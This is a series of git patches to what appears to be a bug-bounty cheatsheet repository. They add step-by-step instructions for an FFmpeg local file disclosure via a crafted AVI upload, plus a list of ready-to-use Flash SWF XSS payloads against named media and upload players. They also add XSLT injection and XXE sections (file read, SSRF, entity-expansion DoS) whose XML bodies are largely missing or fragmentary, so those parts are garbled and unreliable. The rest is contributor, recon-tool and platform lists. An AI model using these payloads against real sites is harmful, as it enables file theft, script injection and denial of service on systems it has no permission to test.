From beb7e19ffb5c354e61ac40badbc7cf7977cd50e6 Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 17:27:43 +0100 Subject: [PATCH 01/17] Add explanation and PoC for FFmpeg LFD --- cheatsheets/lfi.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/cheatsheets/lfi.md b/cheatsheets/lfi.md index 36c0501..4233520 100644 --- a/cheatsheets/lfi.md +++ b/cheatsheets/lfi.md @@ -21,3 +21,17 @@ ``` /%5c.. ``` + +**FFmpeg Local File Disclosure** + +This [script](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing [HLS playlists](https://ffmpeg.org/ffmpeg-formats.html#hls-2). + +_Steps to reproduce_ + +1. Please download the script from @neex to your "attacker" instance +2. Execute the script with your desired parameters: `python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi` +3. Upload the generated AVI file to your target site (e.g. within a 'video upload page') +4. The target may process the malicious HLS inclusion with FFmpeg on the server-side. +5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video. + +Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner. From a2160dfb7353f7fe60350368684e50a037072994 Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Wed, 27 Sep 2017 18:39:57 +0200 Subject: [PATCH 02/17] Add neutrinoguy to "Contributors" section. --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index fb7d14c..7ea23da 100644 --- a/README.md +++ b/README.md @@ -49,3 +49,4 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR - [jon_bottarini](https://github.com/BlueTower) - [sp1d3r](https://github.com/sp1d3r) - [yasinS](https://github.com/yasinS) +- [neutrinoguy](https://github.com/neutrinoguy) From 2b28b977e33f53abe13be85f66a84252a9e7af1e Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 17:45:32 +0100 Subject: [PATCH 03/17] [Recon] Add extra web-based tools for web recon --- cheatsheets/special-tools.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md index c45896e..5b30de2 100644 --- a/cheatsheets/special-tools.md +++ b/cheatsheets/special-tools.md @@ -30,7 +30,13 @@ otherapp.10.0.0.1.nip.io **Reconnaissance** +- https://dnsdumpster.com (DNS and subdomain recon) +- http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon) +- https://mxtoolbox.com (wide range of DNS-related recon tools) - https://publicwww.com/ (Source Code Search Engine) +- [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) +- [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) +- [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) **Report Templates** From 517e25abe9d8bf7d3a2edd22d4b39ba5600e0ebf Mon Sep 17 00:00:00 2001 From: kuromatae Date: Wed, 27 Sep 2017 18:51:37 +0200 Subject: [PATCH 04/17] Update bugbountyplatforms.md --- cheatsheets/bugbountyplatforms.md | 1 + 1 file changed, 1 insertion(+) diff --git a/cheatsheets/bugbountyplatforms.md b/cheatsheets/bugbountyplatforms.md index 82a89f4..a88e7c4 100644 --- a/cheatsheets/bugbountyplatforms.md +++ b/cheatsheets/bugbountyplatforms.md @@ -8,3 +8,4 @@ - [BountyFactory](https://bountyfactory.io/) - [Intigriti](https://intigriti.be/) - [Bugbountyjp](https://bugbounty.jp/) +- [BountyFactory](https://bountyfactory.io/) From fc48602f94fe39925a5e62f1f63507701e7d8ac4 Mon Sep 17 00:00:00 2001 From: kuromatae Date: Wed, 27 Sep 2017 18:54:53 +0200 Subject: [PATCH 05/17] Update bugbountyplatforms.md Added Yogosha --- cheatsheets/bugbountyplatforms.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cheatsheets/bugbountyplatforms.md b/cheatsheets/bugbountyplatforms.md index a88e7c4..52f0e09 100644 --- a/cheatsheets/bugbountyplatforms.md +++ b/cheatsheets/bugbountyplatforms.md @@ -8,4 +8,4 @@ - [BountyFactory](https://bountyfactory.io/) - [Intigriti](https://intigriti.be/) - [Bugbountyjp](https://bugbounty.jp/) -- [BountyFactory](https://bountyfactory.io/) +- [Yogosha](https://www.yogosha.com/) From 967d3d53812d94f159040394dd8363b1cc753443 Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Wed, 27 Sep 2017 19:07:59 +0200 Subject: [PATCH 06/17] Add kuromatae to "Contributors" section. --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 7ea23da..708b753 100644 --- a/README.md +++ b/README.md @@ -50,3 +50,4 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR - [sp1d3r](https://github.com/sp1d3r) - [yasinS](https://github.com/yasinS) - [neutrinoguy](https://github.com/neutrinoguy) +- [kuromatae](https://github.com/kuromatae) From c7775ecdbc27dbf1cfdbde9aa5937d03d4eaa8de Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 19:45:22 +0100 Subject: [PATCH 07/17] [XSS] Add collection of SWF XSS payloads Sourced from personal notes, Cure53 Flashbang (https://github.com/cure53/Flashbang/blob/master/flash-files/index.html) and other sources --- cheatsheets/xss.md | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index e62354b..125e038 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -110,6 +110,32 @@ javas cript://www.google.com/%0Aalert(1) [a](javascript:window.onerror=confirm;throw%201) ``` +**Flash SWF XSS** + +- ZeroClipboard: `ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf` + +- plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&` + +- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` + +- FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` + +- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` + +- YUI "io.swf": `/io.swf?yid=\"));}catch(e){alert(document.domain);}//` + +- YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<` + +- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` + +- Banner.swf (unknown): `/banner.swf?clickTAG=javascript:alert(document.domain);//` + +- JWPlayer (legacy): `/player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` + +- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//` + +- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` + **Lightweight Markup Languages** **RubyDoc** (.rdoc) From c0582d53abe41ef319a28af8e99030126808c353 Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 19:48:38 +0100 Subject: [PATCH 08/17] [XSS] clean up Flash payloads and add note --- cheatsheets/xss.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index 125e038..4e5593e 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -122,20 +122,22 @@ javas cript://www.google.com/%0Aalert(1) - videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` -- YUI "io.swf": `/io.swf?yid=\"));}catch(e){alert(document.domain);}//` +- YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//` - YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<` - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` -- Banner.swf (unknown): `/banner.swf?clickTAG=javascript:alert(document.domain);//` +- Banner.swf (unknown): `banner.swf?clickTAG=javascript:alert(document.domain);//` -- JWPlayer (legacy): `/player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` +- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` - SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//` - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` +_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ + **Lightweight Markup Languages** **RubyDoc** (.rdoc) From 3dc01e25d211f7e223a18f66d994d62ff46ff2ee Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Wed, 27 Sep 2017 19:57:21 +0100 Subject: [PATCH 09/17] [XSS] additional cleanup of Flash refs --- cheatsheets/xss.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index 4e5593e..9fd8b26 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -116,7 +116,7 @@ javas cript://www.google.com/%0Aalert(1) - plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&` -- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` +- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` (also works with `Moxie.cdn.swf` and other variants) - FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` @@ -128,7 +128,7 @@ javas cript://www.google.com/%0Aalert(1) - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` -- Banner.swf (unknown): `banner.swf?clickTAG=javascript:alert(document.domain);//` +- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//` - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` From afde105029dcfb9c53158db3fecccc930cccd2e9 Mon Sep 17 00:00:00 2001 From: kuromatae Date: Thu, 28 Sep 2017 11:04:55 +0200 Subject: [PATCH 10/17] Added XSLT Injection --- cheatsheets/xslt | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cheatsheets/xslt diff --git a/cheatsheets/xslt b/cheatsheets/xslt new file mode 100644 index 0000000..5fb2a1d --- /dev/null +++ b/cheatsheets/xslt @@ -0,0 +1,25 @@ +## XSLT Injection + +**Backend infos** + +```xml + + + + xsl:vendor =
+ xsl:version =
+ + +``` + +**Injecting in PHP** + +```xml + + + + + + +``` + From 183d8c6d50092be1c53a77059440c494573289fa Mon Sep 17 00:00:00 2001 From: kuromatae Date: Thu, 28 Sep 2017 11:05:37 +0200 Subject: [PATCH 11/17] Fixed file name --- cheatsheets/{xslt => xslt.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cheatsheets/{xslt => xslt.md} (100%) diff --git a/cheatsheets/xslt b/cheatsheets/xslt.md similarity index 100% rename from cheatsheets/xslt rename to cheatsheets/xslt.md From b96a10fdc58cf33e8c983103380b2f073e3aac5d Mon Sep 17 00:00:00 2001 From: kuromatae Date: Thu, 28 Sep 2017 11:09:59 +0200 Subject: [PATCH 12/17] Add XSLT to Cheat Sheet --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 708b753..ba5e64d 100644 --- a/README.md +++ b/README.md @@ -15,6 +15,7 @@ - [Crypto](cheatsheets/crypto.md) - [Template Injection](cheatsheets/template-injection.md) - [Content Injection](cheatsheets/content-injection.md) +- [XSLT Injection](cheatsheets/xslt.md) # Contributing From 36f6a47a9050478d62ece1551116f6eca5b93825 Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Thu, 28 Sep 2017 10:54:14 +0100 Subject: [PATCH 13/17] [Tools] Add HackerTarget free tools link --- cheatsheets/special-tools.md | 1 + 1 file changed, 1 insertion(+) diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md index 5b30de2..a354f6a 100644 --- a/cheatsheets/special-tools.md +++ b/cheatsheets/special-tools.md @@ -34,6 +34,7 @@ otherapp.10.0.0.1.nip.io - http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon) - https://mxtoolbox.com (wide range of DNS-related recon tools) - https://publicwww.com/ (Source Code Search Engine) +- [HackerTarget Tools](https://hackertarget.com/ip-tools/) (DNS recon, site lookup, and scanning tools) - [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) - [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) - [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) From 7201894c2864ac9682d07b3c541c1cda60fd9415 Mon Sep 17 00:00:00 2001 From: Evgeniy Yakovchuk Date: Thu, 28 Sep 2017 17:33:22 +0300 Subject: [PATCH 14/17] Creating XXE section And adding some payloads:) --- cheatsheets/xxe.md | 59 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 cheatsheets/xxe.md diff --git a/cheatsheets/xxe.md b/cheatsheets/xxe.md new file mode 100644 index 0000000..dce99cc --- /dev/null +++ b/cheatsheets/xxe.md @@ -0,0 +1,59 @@ +LFI Test +``` + + +]>&xxe; +``` + +Blind LFI test (when first case doesn't return anything) +``` + + + +]>&blind; +``` + +Access Control bypass (loading restricted resources - PHP example) +``` + +]> + +``` + +SSRF Test +``` + + +]>&xxe; +``` + +XEE (XML Entity Expansion - DOS) +``` + + + + + + + + + + + + +]> +&lol9; +``` + +XEE #2 (Remote attack - through external xml inclusion) +``` + +]> +3..2..1...&test +``` From 793328b4cf6794f17e10d9068ae4f14e4368afe8 Mon Sep 17 00:00:00 2001 From: Evgeniy Yakovchuk Date: Thu, 28 Sep 2017 17:39:50 +0300 Subject: [PATCH 15/17] Make bold headings --- cheatsheets/xxe.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cheatsheets/xxe.md b/cheatsheets/xxe.md index dce99cc..49ea531 100644 --- a/cheatsheets/xxe.md +++ b/cheatsheets/xxe.md @@ -1,4 +1,4 @@ -LFI Test +**LFI Test** ``` ]>&xxe; ``` -Blind LFI test (when first case doesn't return anything) +**Blind LFI test (when first case doesn't return anything)** ``` ]>&blind; ``` -Access Control bypass (loading restricted resources - PHP example) +**Access Control bypass (loading restricted resources - PHP example)** ``` ``` -SSRF Test +**SSRF Test** ``` ]>&xxe; ``` -XEE (XML Entity Expansion - DOS) +**XEE (XML Entity Expansion - DOS)** ``` &lol9; ``` -XEE #2 (Remote attack - through external xml inclusion) +**XEE #2 (Remote attack - through external xml inclusion)** ``` Date: Thu, 28 Sep 2017 17:40:40 +0300 Subject: [PATCH 16/17] Adding link to the XXE section --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index ba5e64d..be66466 100644 --- a/README.md +++ b/README.md @@ -10,6 +10,7 @@ - [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md) - [CSV Injection](cheatsheets/csv-injection.md) - [LFI](cheatsheets/lfi.md) +- [RCE](cheatsheets/xxe.md) - [RCE](cheatsheets/rce.md) - [Open Redirect](cheatsheets/open-redirect.md) - [Crypto](cheatsheets/crypto.md) From 60c998c43dc1eed273f85778f10d59bde4a0e5c6 Mon Sep 17 00:00:00 2001 From: Evgeniy Yakovchuk Date: Thu, 28 Sep 2017 17:41:00 +0300 Subject: [PATCH 17/17] Fix a typo:) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index be66466..921f75d 100644 --- a/README.md +++ b/README.md @@ -10,7 +10,7 @@ - [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md) - [CSV Injection](cheatsheets/csv-injection.md) - [LFI](cheatsheets/lfi.md) -- [RCE](cheatsheets/xxe.md) +- [XXE](cheatsheets/xxe.md) - [RCE](cheatsheets/rce.md) - [Open Redirect](cheatsheets/open-redirect.md) - [Crypto](cheatsheets/crypto.md)